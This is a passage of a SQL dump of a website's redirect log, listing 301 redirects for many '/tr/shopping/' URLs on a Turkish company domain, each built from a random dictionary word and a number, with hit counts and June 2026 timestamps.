00:00:00',301),(68053,'https://3s-technologies.com.tr/tr/shopping/investor/367868139.html',NULL,'https://3s-technologies.com.tr/shopping/investor/367868139.html','',1,0,'2026-06-10 23:48:02','0000-00-00 00:00:00',301),(68054,'https://3s-technologies.com.tr/tr/shopping/nostalgy/3794831657.html',NULL,'https://3s-technologies.com.tr/shopping/nostalgy/3794831657.html','',1,0,'2026-06-10 23:48:05','0000-00-00 00:00:00',301),(68055,'https://3s-technologies.com.tr/tr/shopping/furfuraceous/1743807982.html',NULL,'https://3s-technologies.com.tr/shopping/furfuraceous/1743807982.html','',1,0,'2026-06-10 23:48:08','0000-00-00 00:00:00',301),(68056,'https://3s-technologies.com.tr/tr/shopping/maistress/1459268208.html',NULL,'https://3s-technologies.com.tr/shopping/maistress/1459268208.html','',1,0,'2026-06-10 23:48:11','0000-00-00 00:00:00',301),(68057,'https://3s-technologies.com.tr/tr/shopping/africanamerican/1152204693.html',NULL,'https://3s-technologies.com.tr/shopping/africanamerican/1152204693.html','',1,0,'2026-06-10 23:48:14','0000-00-00 00:00:00',301),(68058,'https://3s-technologies.com.tr/tr/shopping/bibliopegist/1166528416.html',NULL,'https://3s-technologies.com.tr/shopping/bibliopegist/1166528416.html','',1,0,'2026-06-10 23:48:17','0000-00-00 00:00:00',301),(68059,'https://3s-technologies.com.tr/tr/shopping/senteur/2750252351.html',NULL,'https://3s-technologies.com.tr/shopping/senteur/2750252351.html','',1,0,'2026-06-10 23:48:20','0000-00-00 00:00:00',301),(68060,'https://3s-technologies.com.tr/tr/shopping/novelist/3712784179.html',NULL,'https://3s-technologies.com.tr/shopping/novelist/3712784179.html','',1,0,'2026-06-10 23:48:23','0000-00-00 00:00:00',301),(68061,'https://3s-technologies.com.tr/tr/shopping/disownment/1181605711.html',NULL,'https://3s-technologies.com.tr/shopping/disownment/1181605711.html','',1,0,'2026-06-10 23:48:26','0000-00-00 00:00:00',301),(68062,'https://3s-technologies.com.tr/tr/shopping/gastrophrenic/3255295306.html',NULL,'https://3s-technologies.com.tr/shopping/gastrophrenic/3255295306.html','',1,0,'2026-06-10 23:48:29','0000-00-00 00:00:00',301),(68063,'https://3s-technologies.com.tr/tr/shopping/unhappily/1454679420.html',NULL,'https://3s-technologies.com.tr/shopping/unhappily/1454679420.html','',1,0,'2026-06-10 23:48:32','0000-00-00 00:00:00',301),(68064,'https://3s-technologies.com.tr/tr/shopping/musica/200759551.html',NULL,'https://3s-technologies.com.tr/shopping/musica/200759551.html','',1,0,'2026-06-10 23:48:35','0000-00-00 00:00:00',301),(68065,'https://3s-technologies.com.tr/tr/shopping/jackbythehedge/2254551779.html',NULL,'https://3s-technologies.com.tr/shopping/jackbythehedge/2254551779.html','',1,0,'2026-06-10 23:48:38','0000-00-00 00:00:00',301),(68066,'https://3s-technologies.com.tr/tr/shopping/alumine/107724219.html',NULL,'https://3s-technologies.com.tr/shopping/alumine/107724219.html','',1,0,'2026-06-10 23:48:41','0000-00-00 00:00:00',301),(68067,'https://3s-technologies.com.tr/tr/shopping/chirologist/1554237701.html',NULL,'https://3s-technologies.com.tr/shopping/chirologist/1554237701.html','',1,0,'2026-06-10 23:48:44','0000-00-00 00:00:00',301),(68068,'https://3s-technologies.com.tr/tr/shopping/distinguishableness/1698199318.html',NULL,'https://3s-technologies.com.tr/shopping/distinguishableness/1698199318.html','',1,0,'2026-06-10 23:48:47','0000-00-00 00:00:00',301),(68069,'https://3s-technologies.com.tr/tr/shopping/hobbarddehoy/351120218.html',NULL,'https://3s-technologies.com.tr/shopping/hobbarddehoy/351120218.html','',1,0,'2026-06-10 23:48:50','0000-00-00 00:00:00',301),(68070,'https://3s-technologies.com.tr/tr/shopping/imperiwigged/1528919369.html',NULL,'https://3s-technologies.com.tr/shopping/imperiwigged/1528919369.html','',1,0,'2026-06-10 23:48:53','0000-00-00 00:00:00',301),(68071,'https://3s-technologies.com.tr/tr/shopping/eversive/675459353.html',NULL,'https://3s-technologies.com.tr/shopping/eversive/675459353.html','',1,0,'2026-06-10 23:49:04','0000-00-00 00:00:00',301),(68072,'http://3s-technologies.com.tr/tr/shopping/reunition/449623611.html',NULL,'','',1,0,'2026-06-10 23:49:06','0000-00-00 00:00:00',301),(68073,'https://3s-technologies.com.tr/tr/shopping/squash/1771889637.html',NULL,'https://3s-technologies.com.tr/shopping/squash/1771889637.html','',1,0,'2026-06-10 23:49:07','0000-00-00 00:00:00',301),(68074,'https://3s-technologies.com.tr/tr/shopping/sciagraphical/3785432693.html',NULL,'https://3s-technologies.com.tr/shopping/sciagraphical/3785432693.html','',1,0,'2026-06-10 23:49:10','0000-00-00 00:00:00',301),(68075,'http://3s-technologies.com.tr/tr/shopping/oological/3309300232.html',NULL,'','',1,0,'2026-06-10 23:49:10','0000-00-00 00:00:00',301),(68076,'http://3s-technologies.com.tr/tr/shopping/coronule/48966225.html',NULL,'','',1,0,'2026-06-10 23:49:12','0000-00-00 00:00:00',301),(68077,'https://3s-technologies.com.tr/tr/shopping/hernshaw/2086311464.html',NULL,'https://3s-technologies.com.tr/shopping/hernshaw/2086311464.html','',1,0,'2026-06-10 23:49:13','0000-00-00 00:00:00',301),(68078,'http://3s-technologies.com.tr/tr/shopping/circum/530055213.html',NULL,'','',1,0,'2026-06-10 23:49:15','0000-00-00 00:00:00',301),(68079,'https://3s-technologies.com.tr/tr/shopping/jugging/750186153.html',NULL,'https://3s-technologies.com.tr/shopping/jugging/750186153.html','',1,0,'2026-06-10 23:49:16','0000-00-00 00:00:00',301),(68080,'http://3s-technologies.com.tr/tr/shopping/disrobe/3090478918.html',NULL,'','',2,0,'2026-06-10 23:49:18','0000-00-00 00:00:00',301),(68081,'https://3s-technologies.com.tr/tr/shopping/disroot/1300902479.html',NULL,'https://3s-technologies.com.tr/shopping/disroot/1300902479.html','',1,0,'2026-06-10 23:49:19','0000-00-00 00:00:00',301),(68082,'https://3s-technologies.com.tr/tr/shopping/petrologically/2584831485.html',NULL,'https://3s-technologies.com.tr/shopping/petrologically/2584831485.html','',1,0,'2026-06-10 23:49:22','0000-00-00 00:00:00',301),(68083,'http://3s-technologies.com.tr/tr/shopping/strath/4056854932.html',NULL,'','',1,0,'2026-06-10 23:49:22','0000-00-00 00:00:00',301),(68084,'https://3s-technologies.com.tr/tr/shopping/geniculate/4146675267.html',NULL,'https://3s-technologies.com.tr/shopping/geniculate/4146675267.html','',1,0,'2026-06-10 23:49:25','0000-00-00 00:00:00',301),(68085,'https://3s-technologies.com.tr/tr/shopping/blacked/445033979.html',NULL,'https://3s-technologies.com.tr/shopping/blacked/445033979.html','',1,0,'2026-06-10 23:49:28','0000-00-00 00:00:00',301),(68086,'https://3s-technologies.com.tr/tr/shopping/daddle/3440699985.html',NULL,'https://3s-technologies.com.tr/shopping/daddle/3440699985.html','',1,0,'2026-06-10 23:49:31','0000-00-00 00:00:00',301),(68087,'https://3s-technologies.com.tr/tr/shopping/behoovable/3437159773.html',NULL,'https://3s-technologies.com.tr/shopping/behoovable/3437159773.html','',1,0,'2026-06-10 23:49:34','0000-00-00 00:00:00',301),(68088,'https://3s-technologies.com.tr/tr/shopping/perilously/3796823337.html',NULL,'https://3s-technologies.com.tr/shopping/perilously/3796823337.html','',1,0,'2026-06-10 23:49:37','0000-00-00 00:00:00',301),(68089,'https://3s-technologies.com.tr/tr/shopping/parlously/1607965962.html',NULL,'https://3s-technologies.com.tr/shopping/parlously/1607965962.html','',1,0,'2026-06-10 23:49:40','0000-00-00 00:00:00',301),(68090,'https://3s-technologies.com.tr/tr/shopping/atrous/2676046566.html',NULL,'https://3s-technologies.com.tr/shopping/atrous/2676046566.html','',1,0,'2026-06-10 23:49:43','0000-00-00 00:00:00',301),(68091,'https://3s-technologies.com.tr/tr/shopping/danaidae/626096293.html',NULL,'https://3s-technologies.com.tr/shopping/danaidae/626096293.html','',1,0,'2026-06-10 23:49:46','0000-00-00 00:00:00',301),(68092,'https://3s-technologies.com.tr/tr/shopping/circuity/4173930978.html',NULL,'https://3s-technologies.com.tr/shopping/circuity/4173930978.html','',1,0,'2026-06-10 23:49:49','0000-00-00 00:00:00',301),(68093,'https://3s-technologies.com.tr/tr/shopping/orbulina/323368317.html',NULL,'https://3s-technologies.com.tr/shopping/orbulina/323368317.html','',1,0,'2026-06-10 23:49:52','0000-00-00 00:00:00',301),(68094,'https://3s-technologies.com.tr/tr/shopping/converging/2741624059.html',NULL,'https://3s-technologies.com.tr/shopping/converging/2741624059.html','',1,0,'2026-06-10 23:49:55','0000-00-00 00:00:00',301),(68095,'https://3s-technologies.com.tr/tr/shopping/overmodestly/2646628496.html',NULL,'https://3s-technologies.com.tr/shopping/overmodestly/2646628496.html','',1,0,'2026-06-10 23:49:58','0000-00-00 00:00:00',301),(68096,'https://3s-technologies.com.tr/tr/shopping/deceptivity/3908310454.html',NULL,'https://3s-technologies.com.tr/shopping/deceptivity/3908310454.html','',1,0,'2026-06-10 23:50:01','0000-00-00 00:00:00',301),(68097,'https://3s-technologies.com.tr/tr/shopping/discommon/3280834664.html',NULL,'https://3s-technologies.com.tr/shopping/discommon/3280834664.html','',1,0,'2026-06-10 23:50:04','0000-00-00 00:00:00',301),(68098,'https://3s-technologies.com.tr/tr/shopping/deformities/3929042197.html',NULL,'https://3s-technologies.com.tr/shopping/deformities/3929042197.html','',1,0,'2026-06-10 23:50:07','0000-00-00 00:00:00',301),(68099,'https://3s-technologies.com.tr/tr/shopping/stable/2958259230.html',NULL,'https://3s-technologies.com.tr/shopping/stable/2958259230.html','',1,0,'2026-06-10 23:50:10','0000-00-00 00:00:00',301),(68100,'https://3s-technologies.com.tr/tr/shopping/middlingly/4103067686.html',NULL,'https://3s-technologies.com.tr/shopping/middlingly/4103067686.html','',1,0,'2026-06-10 23:50:13','0000-00-00 00:00:00',301),(68101,'https://3s-technologies.com.tr/tr/shopping/suspiciency/679095666.html',NULL,'https://3s-technologies.com.tr/shopping/suspiciency/679095666.html','',1,0,'2026-06-10 23:50:16','0000-00-00 00:00:00',301),(68102,'https://3s-technologies.com.tr/tr/shopping/oxycrate/1379549397.html',NULL,'https://3s-technologies.com.tr/shopping/oxycrate/1379549397.html','',1,0,'2026-06-10 23:50:19','0000-00-00 00:00:00',301),(68103,'https://3s-technologies.com.tr/tr/shopping/angulation/4048888611.html',NULL,'https://3s-technologies.com.tr/shopping/angulation/4048888611.html','',1,0,'2026-06-10 23:50:22','0000-00-00 00:00:00',301),(68104,'https://3s-technologies.com.tr/tr/shopping/cause/2261295770.html',NULL,'https://3s-technologies.com.tr/shopping/cause/2261295770.html','',1,0,'2026-06-10 23:50:25','0000-00-00 00:00:00',301),(68105,'https://3s-technologies.com.tr/tr/shopping/trocha/610560487.html',NULL,'https://3s-technologies.com.tr/shopping/trocha/610560487.html','',1,0,'2026-06-10 23:50:28','0000-00-00 00:00:00',301),(68106,'https://3s-technologies.com.tr/tr/shopping/overmodest/452210472.html',NULL,'https://3s-technologies.com.tr/shopping/overmodest/452210472.html','',1,0,'2026-06-10 23:50:31','0000-00-00 00:00:00',301),(68107,'https://3s-technologies.com.tr/tr/shopping/kicker/4165801962.html',NULL,'https://3s-technologies.com.tr/shopping/kicker/4165801962.html','',1,0,'2026-06-10 23:50:36','0000-00-00 00:00:00',301),(68108,'https://3s-technologies.com.tr/tr/shopping/delation/1769725047.html',NULL,'https://3s-technologies.com.tr/shopping/delation/1769725047.html','',1,0,'2026-06-10 23:50:39','0000-00-00 00:00:00',301),(68109,'https://3s-technologies.com.tr/tr/shopping/funiliform/3029186210.html',NULL,'https://3s-technologies.com.tr/shopping/funiliform/3029186210.html','',1,0,'2026-06-10 23:50:41','0000-00-00 00:00:00',301),(68110,'https://3s-technologies.com.tr/tr/shopping/dermaptera/370794014.html',NULL,'https://3s-technologies.com.tr/shopping/dermaptera/370794014.html','',1,0,'2026-06-10 23:50:45','0000-00-00 00:00:00',301),(68111,'https://3s-technologies.com.tr/tr/shopping/miauling/1034401319.html',NULL,'https://3s-technologies.com.tr/shopping/miauling/1034401319.html','',1,0,'2026-06-10 23:50:48','0000-00-00 00:00:00',301),(68112,'https://3s-technologies.com.tr/tr/shopping/coefficacy/1669907142.html',NULL,'https://3s-technologies.com.tr/shopping/coefficacy/1669907142.html','',1,0,'2026-06-10 23:50:51','0000-00-00 00:00:00',301),(68113,'https://3s-technologies.com.tr/tr/shopping/graunt/3482931928.html',NULL,'https://3s-technologies.com.tr/shopping/graunt/3482931928.html','',1,0,'2026-06-10 23:50:54','0000-00-00 00:00:00',301),(68114,'https://3s-technologies.com.tr/tr/shopping/elusive/36247577.html',NULL,'https://3s-technologies.com.tr/shopping/elusive/36247577.html','',1,0,'2026-06-10 23:50:57','0000-00-00 00:00:00',301),(68115,'https://3s-technologies.com.tr/tr/shopping/hierogram/1276025558.html',NULL,'https://3s-technologies.com.tr/shopping/hierogram/1276025558.html','',1,0,'2026-06-10 23:51:00','0000-00-00 00:00:00',301),(68116,'https://3s-technologies.com.tr/tr/shopping/propped/1326550040.html',NULL,'https://3s-technologies.com.tr/shopping/propped/1326550040.html','',1,0,'2026-06-10 23:51:03','0000-00-00 00:00:00',301),(68117,'https://3s-technologies.com.tr/tr/shopping/ruction/2261766901.html',NULL,'https://3s-technologies.com.tr/shopping/ruction/2261766901.html','',1,0,'2026-06-10 23:51:06','0000-00-00 00:00:00',301),(68118,'https://3s-technologies.com.tr/tr/shopping/sphenurus/1745964172.html',NULL,'https://3s-technologies.com.tr/shopping/sphenurus/1745964172.html','',1,0,'2026-06-10 23:51:09','0000-00-00 00:00:00',301),(68119,'http://3s-technologies.com.tr/tr/shopping/scoticus/1258837086.html',NULL,'','',2,0,'2026-06-10 23:51:11','0000-00-00 00:00:00',301),(68120,'https://3s-technologies.com.tr/tr/shopping/hemispheres/571148745.html',NULL,'https://3s-technologies.com.tr/shopping/hemispheres/571148745.html','',1,0,'2026-06-10 23:51:12','0000-00-00 00:00:00',301),(68121,'https://3s-technologies.com.tr/tr/shopping/influentially/2200758481.html',NULL,'https://3s-technologies.com.tr/shopping/influentially/2200758481.html','',1,0,'2026-06-10 23:51:15','0000-00-00 00:00:00',301),(68122,'https://3s-technologies.com.tr/tr/shopping/inculk/3587079013.html',NULL,'https://3s-technologies.com.tr/shopping/inculk/3587079013.html','',1,0,'2026-06-10 23:51:18','0000-00-00 00:00:00',301),(68123,'http://3s-technologies.com.tr/tr/shopping/cytinus/854663343.html',NULL,'','',1,0,'2026-06-10 23:51:19','0000-00-00 00:00:00',301),(68124,'https://3s-technologies.com.tr/tr/shopping/stigmatize/335133614.html',NULL,'https://3s-technologies.com.tr/shopping/stigmatize/335133614.html','',1,0,'2026-06-10 23:51:21','0000-00-00 00:00:00',301),(68125,'https://3s-technologies.com.tr/tr/shopping/deans/889552211.html',NULL,'https://3s-technologies.com.tr/shopping/deans/889552211.html','',1,0,'2026-06-10 23:51:24','0000-00-00 00:00:00',301),(68126,'https://3s-technologies.com.tr/tr/shopping/multinucleate/283560556.html',NULL,'https://3s-technologies.com.tr/shopping/multinucleate/283560556.html','',1,0,'2026-06-10 23:51:27','0000-00-00 00:00:00',301),(68127,'https://3s-technologies.com.tr/tr/shopping/frizzly/3620133396.html',NULL,'https://3s-technologies.com.tr/shopping/frizzly/3620133396.html','',1,0,'2026-06-10 23:51:30','0000-00-00 00:00:00',301),(68128,'https://3s-technologies.com.tr/tr/shopping/thryfallow/791206029.html',NULL,'https://3s-technologies.com.tr/shopping/thryfallow/791206029.html','',1,0,'2026-06-10 23:51:33','0000-00-00 00:00:00',301),(68129,'http://3s-technologies.com.tr/tr/shopping/indilatory/1683230724.html',NULL,'','',1,0,'2026-06-10 23:51:35','0000-00-00 00:00:00',301),(68130,'https://3s-technologies.com.tr/tr/shopping/ribless/3563577746.html',NULL,'https://3s-technologies.com.tr/shopping/ribless/3563577746.html','',1,0,'2026-06-10 23:51:36','0000-00-00 00:00:00',301),(68131,'https://3s-technologies.com.tr/tr/shopping/redactor/429939600.html',NULL,'https://3s-technologies.com.tr/shopping/redactor/429939600.html','',1,0,'2026-06-10 23:51:39','0000-00-00 00:00:00',301),(68132,'https://3s-technologies.com.tr/tr/shopping/dedecorous/3877254955.html',NULL,'https://3s-technologies.com.tr/shopping/dedecorous/3877254955.html','',1,0,'2026-06-10 23:51:42','0000-00-00 00:00:00',301),(68133,'http://3s-technologies.com.tr/tr/shopping/eliminated/3187494902.html',NULL,'','',1,0,'2026-06-10 23:51:43','0000-00-00 00:00:00',301),(68134,'https://3s-technologies.com.tr/tr/shopping/boweled/4282183292.html',NULL,'https://3s-technologies.com.tr/shopping/boweled/4282183292.html','',1,0,'2026-06-10 23:51:45','0000-00-00 00:00:00',301),(68135,'https://3s-technologies.com.tr/tr/shopping/workingday/4290312276.html',NULL,'https://3s-technologies.com.tr/shopping/workingday/4290312276.html','',1,0,'2026-06-10 23:51:48','0000-00-00 00:00:00',301),(68136,'https://3s-technologies.com.tr/tr/shopping/deviceful/2529975130.html',NULL,'https://3s-technologies.com.tr/shopping/deviceful/2529975130.html','',1,0,'2026-06-10 23:51:51','0000-00-00 00:00:00',301),(68137,'http://3s-technologies.com.tr/tr/shopping/rubiaceae/1898308454.html',NULL,'','',1,0,'2026-06-10 23:51:52','0000-00-00 00:00:00',301),(68138,'https://3s-technologies.com.tr/tr/shopping/fleer/2235417896.html',NULL,'https://3s-technologies.com.tr/shopping/fleer/2235417896.html','',1,0,'2026-06-10 23:51:54','0000-00-00 00:00:00',301),(68139,'https://3s-technologies.com.tr/tr/shopping/sensorivolitional/141770300.html',NULL,'https://3s-technologies.com.tr/shopping/sensorivolitional/141770300.html','',1,0,'2026-06-10 23:51:57','0000-00-00 00:00:00',301),(68140,'http://3s-technologies.com.tr/tr/shopping/reticularia/1598135802.html',NULL,'','',1,0,'2026-06-10 23:51:58','0000-00-00 00:00:00',301),(68141,'https://3s-technologies.com.tr/tr/shopping/stellio/1805415167.html',NULL,'https://3s-technologies.com.tr/shopping/stellio/1805415167.html','',1,0,'2026-06-10 23:52:00','0000-00-00 00:00:00',301),(68142,'https://3s-technologies.com.tr/tr/shopping/imbow/2848011701.html',NULL,'https://3s-technologies.com.tr/shopping/imbow/2848011701.html','',1,0,'2026-06-10 23:52:03','0000-00-00 00:00:00',301),(68143,'https://3s-technologies.com.tr/tr/shopping/bottone/2363912919.html',NULL,'https://3s-technologies.com.tr/shopping/bottone/2363912919.html','',1,0,'2026-06-10 23:52:06','0000-00-00 00:00:00',301),(68144,'https://3s-technologies.com.tr/tr/shopping/uveous/1661778158.html',NULL,'https://3s-technologies.com.tr/shopping/uveous/1661778158.html','',1,0,'2026-06-10 23:52:09','0000-00-00 00:00:00',301),(68145,'https://3s-technologies.com.tr/tr/shopping/statesgeneral/4101066635.html',NULL,'https://3s-technologies.com.tr/shopping/statesgeneral/4101066635.html','',1,0,'2026-06-10 23:52:17','0000-00-00 00:00:00',301),(68146,'https://3s-technologies.com.tr/tr/shopping/collapsible/1737457433.html',NULL,'https://3s-technologies.com.tr/shopping/collapsible/1737457433.html','',1,0,'2026-06-10 23:52:20','0000-00-00 00:00:00',301),(68147,'https://3s-technologies.com.tr/tr/shopping/squamose/2382961432.html',NULL,'https://3s-technologies.com.tr/shopping/squamose/2382961432.html','',1,0,'2026-06-10 23:52:22','0000-00-00 00:00:00',301),(68148,'https://3s-technologies.com.tr/tr/shopping/subgranular/3981402024.html',NULL,'https://3s-technologies.com.tr/shopping/subgranular/3981402024.html','',1,0,'2026-06-10 23:52:26','0000-00-00 00:00:00',301),(68149,'https://3s-technologies.com.tr/tr/shopping/flete/758151646.html',NULL,'https://3s-technologies.com.tr/shopping/flete/758151646.html','',1,0,'2026-06-10 23:52:29','0000-00-00 00:00:00',301),(68150,'https://3s-technologies.com.tr/tr/shopping/concavities/2638403395.html',NULL,'https://3s-technologies.com.tr/shopping/concavities/2638403395.html','',1,0,'2026-06-10 23:52:32','0000-00-00 00:00:00',301),(68151,'https://3s-technologies.com.tr/tr/shopping/masting/4213998347.html',NULL,'https://3s-technologies.com.tr/shopping/masting/4213998347.html','',1,0,'2026-06-10 23:52:35','0000-00-00 00:00:00',301),(68152,'https://3s-technologies.com.tr/tr/shopping/sabbatical/360451930.html',NULL,'https://3s-technologies.com.tr/shopping/sabbatical/360451930.html','',1,0,'2026-06-10 23:52:38','0000-00-00 00:00:00',301),(68153,'https://3s-technologies.com.tr/tr/shopping/restrainment/1226435271.html',NULL,'https://3s-technologies.com.tr/shopping/restrainment/1226435271.html','',1,0,'2026-06-10 23:52:41','0000-00-00 00:00:00',301),(68154,'https://3s-technologies.com.tr/tr/shopping/dependance/1393873120.html',NULL,'https://3s-technologies.com.tr/shopping/dependance/1393873120.html','',1,0,'2026-06-10 23:52:44','0000-00-00 00:00:00',301),(68155,'https://3s-technologies.com.tr/tr/shopping/asinea/181578061.html',NULL,'https://3s-technologies.com.tr/shopping/asinea/181578061.html','',1,0,'2026-06-10 23:52:47','0000-00-00 00:00:00',301),(68156,'https://3s-technologies.com.tr/tr/shopping/spathous/3120944752.html',NULL,'https://3s-technologies.com.tr/shopping/spathous/3120944752.html','',1,0,'2026-06-10 23:52:50','0000-00-00 00:00:00',301),(68157,'https://3s-technologies.com.tr/tr/shopping/diversifiable/4053477399.html',NULL,'https://3s-technologies.com.tr/shopping/diversifiable/4053477399.html','',1,0,'2026-06-10 23:52:53','0000-00-00 00:00:00',301),(68158,'https://3s-technologies.com.tr/tr/shopping/hydrostatic/2463002300.html',NULL,'https://3s-technologies.com.tr/shopping/hydrostatic/2463002300.html','',1,0,'2026-06-10 23:52:56','0000-00-00 00:00:00',301),(68159,'https://3s-technologies.com.tr/tr/shopping/accend/3105850357.html',NULL,'https://3s-technologies.com.tr/shopping/accend/3105850357.html','',1,0,'2026-06-10 23:52:59','0000-00-00 00:00:00',301),(68160,'https://3s-technologies.com.tr/tr/shopping/beamlet/2935592307.html',NULL,'https://3s-technologies.com.tr/shopping/beamlet/2935592307.html','',1,0,'2026-06-10 23:53:02','0000-00-00 00:00:00',301),(68161,'https://3s-technologies.com.tr/tr/shopping/supplicate/798122930.html',NULL,'https://3s-technologies.com.tr/shopping/supplicate/798122930.html','',1,0,'2026-06-10 23:53:05','0000-00-00 00:00:00',301),(68162,'https://3s-technologies.com.tr/tr/shopping/oratory/795958324.html',NULL,'https://3s-technologies.com.tr/shopping/oratory/795958324.html','',1,0,'2026-06-10 23:53:08','0000-00-00 00:00:00',301),(68163,'https://3s-technologies.com.tr/tr/shopping/embattling/1278613295.html',NULL,'https://3s-technologies.com.tr/shopping/embattling/1278613295.html','',1,0,'2026-06-10 23:53:11','0000-00-00 00:00:00',301),(68164,'https://3s-technologies.com.tr/tr/shopping/quadrisulcate/3447712971.html',NULL,'https://3s-technologies.com.tr/shopping/quadrisulcate/3447712971.html','',1,0,'2026-06-10 23:53:19','0000-00-00 00:00:00',301),(68165,'https://3s-technologies.com.tr/tr/shopping/hippocras/3883219349.html',NULL,'https://3s-technologies.com.tr/shopping/hippocras/3883219349.html','',1,0,'2026-06-10 23:53:24','0000-00-00 00:00:00',301),(68166,'https://3s-technologies.com.tr/tr/shopping/gothicism/1702401999.html',NULL,'https://3s-technologies.com.tr/shopping/gothicism/1702401999.html','',1,0,'2026-06-10 23:53:27','0000-00-00 00:00:00',301),(68167,'https://3s-technologies.com.tr/tr/shopping/seignette/167695765.html',NULL,'https://3s-technologies.com.tr/shopping/seignette/167695765.html','',1,0,'2026-06-10 23:53:30','0000-00-00 00:00:00',301),(68168,'https://3s-technologies.com.tr/tr/shopping/actuality/327957105.html',NULL,'https://3s-technologies.com.tr/shopping/actuality/327957105.html','',1,0,'2026-06-10 23:53:33','0000-00-00 00:00:00',301),(68169,'https://3s-technologies.com.tr/tr/shopping/profanation/3253908214.html',NULL,'https://3s-technologies.com.tr/shopping/profanation/3253908214.html','',1,0,'2026-06-10 23:53:36','0000-00-00 00:00:00',301),(68170,'https://3s-technologies.com.tr/tr/shopping/merestone/965004275.html',NULL,'https://3s-technologies.com.tr/shopping/merestone/965004275.html','',1,0,'2026-06-10 23:53:39','0000-00-00 00:00:00',301),(68171,'https://3s-technologies.com.tr/tr/shopping/disqualification/1859286618.html',NULL,'https://3s-technologies.com.tr/shopping/disqualification/1859286618.html','',1,0,'2026-06-10 23:53:42','0000-00-00 00:00:00',301),(68172,'https://3s-technologies.com.tr/tr/shopping/counterpoint/1176467277.html',NULL,'https://3s-technologies.com.tr/shopping/counterpoint/1176467277.html','',1,0,'2026-06-10 23:53:45','0000-00-00 00:00:00',301),(68173,'https://3s-technologies.com.tr/tr/shopping/benday/922212774.html',NULL,'https://3s-technologies.com.tr/shopping/benday/922212774.html','',1,0,'2026-06-10 23:53:48','0000-00-00 00:00:00',301),(68174,'https://3s-technologies.com.tr/tr/shopping/alkahest/841781172.html',NULL,'https://3s-technologies.com.tr/shopping/alkahest/841781172.html','',1,0,'2026-06-10 23:53:51','0000-00-00 00:00:00',301),(68175,'https://3s-technologies.com.tr/tr/shopping/termini/2692475199.html',NULL,'https://3s-technologies.com.tr/shopping/termini/2692475199.html','',1,0,'2026-06-10 23:53:54','0000-00-00 00:00:00',301),(68176,'https://3s-technologies.com.tr/tr/shopping/booty/1547774015.html',NULL,'https://3s-technologies.com.tr/shopping/booty/1547774015.html','',1,0,'2026-06-10 23:53:57','0000-00-00 00:00:00',301),(68177,'https://3s-technologies.com.tr/tr/shopping/improficiency/2112400468.html',NULL,'https://3s-technologies.com.tr/shopping/improficiency/2112400468.html','',1,0,'2026-06-10 23:54:00','0000-00-00 00:00:00',301),(68178,'https://3s-technologies.com.tr/tr/shopping/macropodal/3437323296.html',NULL,'https://3s-technologies.com.tr/shopping/macropodal/3437323296.html','',1,0,'2026-06-10 23:54:03','0000-00-00 00:00:00',301),(68179,'https://3s-technologies.com.tr/tr/shopping/herma/3598796719.html',NULL,'https://3s-technologies.com.tr/shopping/herma/3598796719.html','',1,0,'2026-06-10 23:54:06','0000-00-00 00:00:00',301),(68180,'https://3s-technologies.com.tr/tr/shopping/atonicity/159470680.html',NULL,'https://3s-technologies.com.tr/shopping/atonicity/159470680.html','',1,0,'2026-06-10 23:54:09','0000-00-00 00:00:00',301),(68181,'http://3s-technologies.com.tr/tr/shopping/interspace/2965273044.html',NULL,'','',1,0,'2026-06-10 23:54:10','0000-00-00 00:00:00',301),(68182,'https://3s-technologies.com.tr/tr/shopping/ascidiform/2734707142.html',NULL,'https://3s-technologies.com.tr/shopping/ascidiform/2734707142.html','',1,0,'2026-06-10 23:54:12','0000-00-00 00:00:00',301),(68183,'https://3s-technologies.com.tr/tr/shopping/grittiness/3220548441.html',NULL,'https://3s-technologies.com.tr/shopping/grittiness/3220548441.html','',1,0,'2026-06-10 23:54:15','0000-00-00 00:00:00',301),(68184,'https://3s-technologies.com.tr/tr/shopping/permeated/3339929573.html',NULL,'https://3s-technologies.com.tr/shopping/permeated/3339929573.html','',1,0,'2026-06-10 23:54:18','0000-00-00 00:00:00',301),(68185,'https://3s-technologies.com.tr/tr/shopping/niter/3439487886.html',NULL,'https://3s-technologies.com.tr/shopping/niter/3439487886.html','',1,0,'2026-06-10 23:54:21','0000-00-00 00:00:00',301),(68186,'https://3s-technologies.com.tr/tr/shopping/pikestaff/212697280.html',NULL,'https://3s-technologies.com.tr/shopping/pikestaff/212697280.html','',1,0,'2026-06-10 23:54:24','0000-00-00 00:00:00',301),(68187,'https://3s-technologies.com.tr/tr/shopping/inclining/1079892720.html',NULL,'https://3s-technologies.com.tr/shopping/inclining/1079892720.html','',1,0,'2026-06-10 23:54:27','0000-00-00 00:00:00',301),(68188,'https://3s-technologies.com.tr/tr/shopping/resultance/900105425.html',NULL,'https://3s-technologies.com.tr/shopping/resultance/900105425.html','',1,0,'2026-06-10 23:54:30','0000-00-00 00:00:00',301),(68189,'https://3s-technologies.com.tr/tr/shopping/trappist/362616520.html',NULL,'https://3s-technologies.com.tr/shopping/trappist/362616520.html','',1,0,'2026-06-10 23:54:33','0000-00-00 00:00:00',301),(68190,'https://3s-technologies.com.tr/tr/shopping/suddenness/1671119241.html',NULL,'https://3s-technologies.com.tr/shopping/suddenness/1671119241.html','',1,0,'2026-06-10 23:54:36','0000-00-00 00:00:00',301),(68191,'https://3s-technologies.com.tr/tr/shopping/cravingly/523300991.html',NULL,'https://3s-technologies.com.tr/shopping/cravingly/523300991.html','',1,0,'2026-06-10 23:54:39','0000-00-00 00:00:00',301),(68192,'https://3s-technologies.com.tr/tr/shopping/haplodon/61124498.html',NULL,'https://3s-technologies.com.tr/shopping/haplodon/61124498.html','',1,0,'2026-06-10 23:54:42','0000-00-00 00:00:00',301),(68193,'https://3s-technologies.com.tr/tr/shopping/baresthesiometric/851122287.html',NULL,'https://3s-technologies.com.tr/shopping/baresthesiometric/851122287.html','',1,0,'2026-06-10 23:54:45','0000-00-00 00:00:00',301),(68194,'https://3s-technologies.com.tr/tr/shopping/shaffle/4034564904.html',NULL,'https://3s-technologies.com.tr/shopping/shaffle/4034564904.html','',1,0,'2026-06-10 23:54:48','0000-00-00 00:00:00',301),(68195,'https://3s-technologies.com.tr/tr/shopping/clothier/1673543455.html',NULL,'https://3s-technologies.com.tr/shopping/clothier/1673543455.html','',1,0,'2026-06-10 23:54:51','0000-00-00 00:00:00',301),(68196,'http://3s-technologies.com.tr/tr/shopping/spinifex/1113670141.html',NULL,'','',1,0,'2026-06-10 23:54:52','0000-00-00 00:00:00',301),(68197,'https://3s-technologies.com.tr/tr/shopping/ascendent/1272207458.html',NULL,'https://3s-technologies.com.tr/shopping/ascendent/1272207458.html','',1,0,'2026-06-10 23:54:54','0000-00-00 